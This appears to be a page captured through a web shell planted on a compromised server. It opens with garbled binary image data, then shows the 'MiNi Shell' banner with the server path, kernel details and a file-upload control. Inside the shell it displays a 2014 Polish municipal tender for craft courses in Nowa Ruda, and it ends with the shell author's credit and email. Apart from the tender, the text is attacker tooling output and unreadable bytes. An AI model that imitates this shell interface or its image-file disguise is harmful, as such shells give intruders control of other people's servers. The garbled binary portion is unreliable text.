JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140317/88898-N-2014.html

<p class="kh_header"><b>Nowa Ruda: Przygotowanie i przeprowadzenie kursów w ramach programu rewitalizacji społecznej</b><br>
<b>Numer ogłoszenia: 88898 - 2014; data zamieszczenia: 17.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 18, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8721056, faks 074 8721166.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mops.nowaruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kursów w ramach programu rewitalizacji społecznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przygotowanie i przeprowadzenie kursów w ramach programu rewitalizacji społecznej, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet I Zatrudnienie i integracja społeczna, Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego. Zamówienie dotyczy przygotowanie i przeprowadzenie czterech kursów, tj.: Kurs witrażu, Kurs sztukatorski, Kurs kamieniarski, Kurs technik jubilerskich. Nazwa kursu: kurs witrażu. Cel kursu: W czasie trwania kursu uczestnicy zapoznają się z historią witrażownictwa, rozwojem technik, ich zastosowaniem jak obecnymi tendencjami w tej dziedzinie sztuki. Uczestnicy w ramach warsztatów prześledzą cały proces powstawania witrażu, wykonując własne realizacje od fazy projektowania po gotowy produkt. Zagadnienia do zrealizowania w czasie kursu: Podzielony na dwa zadania: technika składania w taśmę miedzianą tiffaniego oraz w ołów. 
Narzędzia (dla jednej osoby): Nóż do szkła, lutownica, kwas lutowniczy, szlifierka do szkła (KRISTAL), szkło kolorowe, nóż do ołowiu, narzędzie pomocnicze, np. gwoździe do mocowania blachy, kawałki sklejki itp., taśma miedziana, ołów. Wymagane jest aby zakupione przez Wykonawcę narzędzie zostały przekazane uczestnikom kursu po ich zakończeniu na własność. W ramach kursu przewiduje się szkolenie 7 osób. Czas trwania kursu: minimum 168 godz. dla jednej osoby (1 godzina odpowiada 1 godzinie dydaktycznej - 45 minut). Uczestnicy szkolenia powinni wziąć udział w minimum 16 godzinach kursu teoretycznego oraz 152 godzinach kursu praktycznego. Wymagany i pożądany termin przeprowadzenia kursu: od 1 do 30 kwietnia 2014 r.,  w dniach od poniedziałku do soboty, nie dłużej niż 8 godzin dziennie, w godzinach 8 00 - 16 00. Miejsce szkolenia: powiat kłodzki. Wykonawca w ofercie poda informacje o bazie szkoleniowej, miejscowości przeprowadzenia kursu, warunkach technicznych lokalu, potencjale technicznym lokalu oraz dokładną datę rozpoczęcia i zakończenia kursu. W przypadku, gdy baza/y szkoleniowa/e, znajduje/ą się poza terenem miasta Nowej Rudy, Wykonawca zapewni dla uczestników kursu bezpłatny transport, na trasie: z miejsca wskazanego przez Zamawiającego na terenie miasta Nowej Rudy do bazy szkoleniowej i z powrotem. 2. Nazwa kursu: kurs sztukatorski. Cel kursu: W ramach kursu uczestnicy zostaną zaznajomieni z technikami sztukatorskimi,  na poziomie pozwalającym im realizować własne  podstawowe zagadnienia takie jak  uzupełnienia (rekonstrukcja) jak i tworzeniem własnych dekoracji gipsowych (płaskorzeźby), wykonywanie  form, odlewy przestrzenne. Zagadnienia do zrealizowania w czasie warsztatów:
Zdobycie umiejętności takich jak: robienie form, gzymsów ciągnionych gipsowych, uzupełnienie sztukaterii, umiejętności pracy przy innych zaprawach, np. cementach romańskich. Narzędzia (dla jednej osoby): narzędzie pomocnicze, np. młotek, szpachelki, skalpele itp., blacha mosiężna, nożyce do blachy, pilniki iglaki, silikon do robienia odlewów, gips, sklejka, ramka do piłek włosowych, piłki włosowe do metalu i drewna, ściski stolarskie, pilniki do gipsu. Wymagane jest aby zakupione przez Wykonawcę narzędzie zostały przekazane uczestnikom kursu po ich zakończeniu na własność. W ramach warsztatów przewiduje się szkolenie 7 osób. Czas trwania kursu: minimum 112 godz. dla jednej osoby (1 godzina odpowiada 1 godzinie dydaktycznej - 45 minut). Uczestnicy powinni wziąć udział w minimum 8 godzinach kursu teoretycznego oraz 104 godzinach kursu praktycznego. Wymagany i pożądany termin przeprowadzenia kursu: od 5 do 27 maja 2014 r.,                 w dniach od poniedziałku do soboty, nie dłużej niż 8 godzin dziennie, w godzinach 8 00 - 16 00. 
Miejsce szkolenia: powiat kłodzki. Wykonawca w ofercie poda informacje o bazie szkoleniowej, miejscowości przeprowadzenia kursu, warunkach technicznych lokalu, potencjale technicznym lokalu oraz dokładną datę rozpoczęcia i zakończenia kursu. W przypadku, gdy baza/y szkoleniowa/e, znajduje/ą się poza terenem miasta Nowej Rudy, Wykonawca zapewni dla uczestników kursu bezpłatny transport, na trasie: z miejsca wskazanego przez Zamawiającego na terenie miasta Nowej Rudy do bazy szkoleniowej i z powrotem. 3. Nazwa kursu: kurs kamieniarski. Cel kursu: W ramach zajęć teoretycznych jak i praktycznych kursu kamieniarskiego, uczestnicy zostaną zaznajomieni z podstawowymi technikami pracy z kamieniem.  Uczestnicy poznają techniki obróbki mechanicznej jak i obróbki ręcznej. Część zajęć odbędzie się w pracowni kamieniarskiej co pozwoli uczestnikom zapoznać się z specyfiką zawodu jak i doskonalić nabywane umiejętności. Zagadnienia do zrealizowania w czasie kursu: Narzędzia (dla jednej osoby): komplet dłut, młotek pucka, szlifierka kontowa, szpachelki, strzałki, silikon do robienia odlewów, tarcza do cięcia kamienia, frez do szlifowania kamienia, klej (żywica epoksydowa), tarcze do szlifowania, narzędzia pomocnicze. Wymagane jest aby zakupione przez Wykonawcę narzędzie zostały przekazane uczestnikom kursu po ich zakończeniu na własność. W ramach warsztatów przewiduje się szkolenie 7 osób. Czas trwania kursu: minimum 112 godz. dla jednej osoby (1 godzina odpowiada 1 godzinie dydaktycznej - 45 minut). Uczestnicy powinni wziąć udział w minimum 12 godzinach kursu teoretycznego oraz 100 godzinach kursu praktycznego. Wymagany i pożądany termin przeprowadzenia kursu: od 28 maja 2014 do 27 czerwca 2014 r., w dniach od poniedziałku do soboty, nie dłużej niż 8 godzin dziennie, w godzinach 8 00 - 16 00. Miejsce szkolenia: zapewnia Zamawiający na terenie Nowej Rudy tj. 57-400 Nowa Ruda, ul. Bohaterów getta 10 - Młodzieżowy Klub Wsparcia. W trakcie realizacji zajęć praktycznych, uczestnicy kursu pracować będą przy odnowieniu elementu architektonicznego w strefie rewitalizacji miasta Nowa Ruda, wskazanej przez zamawiającego. 4. Nazwa kursu: kurs technik jubilerskich. Cel kursu: Kurs ma za zadanie naukę podstawowych technik stosowanych w jubilerstwie. Zagadnienia do zrealizowania w czasie warsztatów: Kurs obejmie przekazanie wiedzy nie tylko czysto technicznej, ale i teoretycznej takiej jak projektowanie, rys historyczny.       W czasie kursu uczestnicy będą pracować na materiałach takich jak miedź, mosiądz i srebro. Pogram kursu ma obejmować następujące zagadnienia: projektowanie, przygotowanie półfabrykatów, potrzebnych do realizacji zadania (walcowanie blach, przeciąganie drutów), piłowanie, wycinanie piką woskową, odlewanie i formowanie metalu, lutowanie, oprawianie kamieni, polerowanie. Narzędzia (dla jednej osoby): palnik jubilerski, cęgi podstawowe, ramka do piłek włosowych, piłki włosowe nr 3,0, lutówka, lut srebrny, srebro próby 925, blacha 10g grubość 0,5 mm, drut srebrny próba 925 grubość 1,5 mm 10 g, blacha miedziana 40 g, grubość 0,5 mm, blacha mosiężna grubość 1,0 mm, 40 g, pilniki: płaski, półokrągły, trójkątny, pilniki iglaki komplet - 10 szt., młotek stalowy 100 g, klin drewniany, płytka lutownicza, pęseta stalowa wygięta, skrobak, pasta polerska zielona, tarcza polerska 6 x 60. Wymagane jest aby zakupione przez Wykonawcę narzędzie zostały przekazane uczestnikom kursu po ich zakończeniu na własność. W ramach warsztatów przewiduje się szkolenie 7 osób. Czas trwania kursu: minimum 168 godz. dla jednej osoby (1 godzina odpowiada 1 godzinie dydaktycznej - 45 minut). Uczestnicy powinni wziąć udział w minimum 12 godzinach kursu teoretycznego oraz 156 godzinach praktycznego. Wymagany i pożądany termin przeprowadzenia kursu: od 30 czerwca do 30 lipca 2014 r., w dniach od poniedziałku do soboty, nie dłużej niż 4 godzin dziennie, w godzinach 8 00 - 16 00. Miejsce szkolenia: zapewnia Zamawiający na terenie Nowej Rudy tj. 57-400 Nowa Ruda, ul. Bohaterów getta 10 - Młodzieżowy Klub Wsparcia. Uwagi dotyczące wszystkich kursów: Instytucja szkoleniowa ma posiadać wpis do Rejestru Instytucji Szkoleniowych 	prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę 	instytucji szkoleniowej, wpis musi być aktualny na 2014 r. Rekrutację osób do projektu przeprowadzi Zamawiający. Zastosowane metody nauczania muszą uwzględniać indywidualne podejście  do każdego  z uczestników. Warunki pracy osób szkolących się w trakcie trwania szkolenia będą zgodne    z przepisami bezpieczeństwa i higieny pracy. Dodatkowe obowiązki Wykonawcy: Wykonawca zapewni dla każdego uczestnika, na własność: niezbędne materiały 	dydaktyczne potrzebne do przyswojenia wiedzy teoretycznej i praktycznej oraz inne 	materiały np. notatnik, długopis itp. z logo Unii Europejskiej, EFS, Narodowej 	Strategii Spójności KAPITAŁ LUDZKI, tytułem projektu o treści: Projekt Nasze miejsca spotkań - tu uczymy się poznajemy każdego dnia współfinansowany z 	Europejskiego Funduszu Społecznego w ramach Działania 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej (zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał 	Ludzki); Wykonawca zapewni uczestnikom kursy w dniach szkolenia: obiad (II drugie danie), 	kawę, herbatę, wodę, napoje gazowane lub soki. Wykonawca do oferty przedłoży harmonogram zajęć. Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków, 	przekazanie kopii polisy ubezpieczeniowej do Zamawiającego. Polisa ubezpieczeniowa musi obejmować pełny okres szkolenia. Wykonawca zapewni swobodny dostęp do sanitariatów dla uczestników szkolenia. Odpowiednie działania informacyjne i promocyjne zgodne z Wytycznymi dotyczącymi realizacji projektów w ramach Programu Operacyjnego Kapitał Ludzki, 	min.: oznaczenia sal szkoleniowych, materiałów szkoleniowych, dokumentów  	w związku ze współfinansowaniem z Europejskiego Funduszu Społecznego -   w uzgodnieniu z Zamawiającym. Przeprowadzenie niezbędnych ankiet ewaluacyjnych wstępnych, środkowych  i końcowych oraz ankiet oceniających zajęcia (wzory ankiet powinny być dołączone do oferty). Sporządzenie raportu ewaluacyjnego na podstawie ankiet ewaluacyjnych. Przekazanie Zamawiającemu protokołów z egzaminów końcowych, listę osób, które 	ukończyły kursy, kserokopię certyfikatów/zaświadczeń o ukończeniu kursów, kserokopię oświadczenia o odbiorze certyfikatów/zaświadczeń o ukończeniu 	kursów, listę odbioru wyżywienia, listę obecności uczestników szkolenia, dzienniki zajęć z podpisami osób prowadzących warsztaty, inne dokumenty, które wynikną w trakcie okresu kursów. Wszystkie niezbędne dokumenty związane z realizacją warsztatów należy dostarczyć Zamawiającemu najpóźniej w dniu zakończenia danego warsztatu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli przepisy prawa nakładają obowiązek ich posiadania; warunek zostanie uznany 	za spełniony, jeśli Wykonawca załączy do oferty:

1)aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez	Wojewódzkie Urzędy Pracy (wpis musi być aktualny na 2014 r).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>(UWAGA: Dotyczy wyłącznie kursów witrażu i sztukatorskiego) Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca dysponuje lub będzie dysponował odpowiednią salą wykładową na terenie powiatu kłodzkiego oraz sprzętem niezbędnym do realizacji zamówienia. Sala wykładowa wyposażone w miejsca siedzące dla wszystkich uczestników szkolenia, ławki/stoliki, sprzęt audiowizualny, flipcharty, tablice szkolne lub magnetyczne. Sala musi spełniać warunki BHP. W przypadku gdy zajęcia praktyczne odbywać się będą w innym miejscu zajęcia dydaktyczne, Wykonawca wskaże miejsce przeprowadzenia tych zajęć. Wykonawca zobowiązany jest przedstawić w  formie wykazu następujące informacje: adres lokalu ze wskazaniem prawa do jego dysponowania (w przypadku, gdy Wykonawca nie posiada własnej bazy lokalowej jest zobowiązany przedłożyć wraz z ofertą dokument (np.; umowa przedwstępną, umowę najmu, pisemne zobowiązanie podmiotu, itp.), że będzie dysponował tymi zasobami przez cały okres realizacji zamówienia). W przypadku, gdy bazy szkoleniowa znajduje się poza terenem miasta Nowej Rudy, Wykonawca zapewni dla uczestników szkolenia bezpłatny transport, na trasie: z miejsca wskazanego przez Zamawiającego na terenie miasta Nowej Rudy do bazy szkoleniowej i z powrotem.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca dysponuje osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób, w tym, co najmniej: 

(1)1 osobę do prowadzenia zajęć teoretycznych i/lub praktycznych z wykształceniem artystycznym, która posiada doświadczenie w przeprowadzeniu co najmniej jednego kursu/szkolenia w zakresie witrażownictwa
(2)1 osobę do prowadzenia zajęć teoretycznych i/lub praktycznych z wykształceniem artystycznym, która posiada doświadczenie w przeprowadzeniu co najmniej jednego kursu/szkolenia w zakresie jubilerstwa
(3)1 osobę do prowadzenia zajęć teoretycznych i/lub praktycznych z wykształceniem artystycznym, która posiada doświadczenie w przeprowadzeniu co najmniej jednego kursu/szkolenia w zakresie sztukatorstwa

Zamawiający dopuszcza możliwość łączenia funkcji poprzez wskazanie jednej osoby do pełnienia dwóch lub większej ilości funkcji, w sytuacji kiedy osoba ta spełnia wymienione w SIWZ warunki dla tych stanowisk.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o 	spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
a)zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy
Powyższe zmiany dopuszczone będą wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę  i po akceptacji przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mops.nowaruda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 57-400 Nowa Ruda, ul. Kolejowa 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 10:00, miejsce: 57-400 Nowa Ruda, ul. Kolejowa 18, nr lokalu  202 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet I Zatrudnienie i integracja społeczna, Działanie 1.2 Wsparcie systemowe instytucji pomocy i integracji społecznej, współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com